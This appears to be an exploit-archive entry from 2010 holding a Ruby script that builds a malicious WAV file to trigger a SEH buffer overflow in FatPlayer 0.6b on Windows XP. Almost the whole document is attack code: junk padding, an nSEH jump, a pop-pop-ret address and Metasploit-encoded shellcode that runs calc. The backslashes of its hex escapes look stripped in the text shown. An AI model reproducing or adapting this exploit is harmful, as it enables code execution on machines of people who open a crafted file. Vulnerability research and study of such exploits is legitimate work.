FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Published : 2010-10-18
# Author : James Fitts
# Previous Title : SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH - DEP BYPASS)
# Next Title : GNU C library dynamic linker $ORIGIN expansion Vulnerability

# Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Date: 10/18/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/fatplayer/files/
# Version: 0.6 Beta
# Tested on: Windows XP SP3 EN
# CVE: N/A

#! /usr/bin/env ruby

junk = "x41" * 4132

nSEH = "x90x90xebx06"

SEH = [0x0046bee3].pack('V') #pop pop ret from FatPlayer.exe

junk2 = "x42x42"

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
payload =  "xdbxc0x31xc9xbfx7cx16x70xcc"
payload << "xd9x74x24xf4xb1x1ex58x31x78"
payload << "x18x83xe8xfcx03x78x68xf4x85"
payload << "x30x78xbcx65xc9x78xb6x23xf5"
payload << "xf3xb4xaex7dx02xaax3ax32x1c"
payload << "xbfx62xedx1dx54xd5x66x29x21"
payload << "xe7x96x60xf5x71xcax06x35xf5"
payload << "x14xc7x7cxfbx1bx05x6bxf0x27"
payload << "xddx48xfdx22x38x1bxa2xe8xc3"
payload << "xf7x3bx7axcfx4cx4fx23xd3x53"
payload << "xa4x57xf7xd8x3bx83x8ex83x1f"
payload << "x57x53x64x51xa1x33xcdxf5xc6"
payload << "xf5xc1x7ex98xf5xaaxf1x05xa8"
payload << "x26x99x3dx3bxc0xd9xfex51x61"
payload << "xb6x0ex2fx85x19x87xb7x78x2f"
payload << "x59x90x7bxd7x05x7fxe8x7bxca"


File.open("crash.wav", 'w') do |b|
	b.write junk + nSEH + SEH + junk2 + payload
end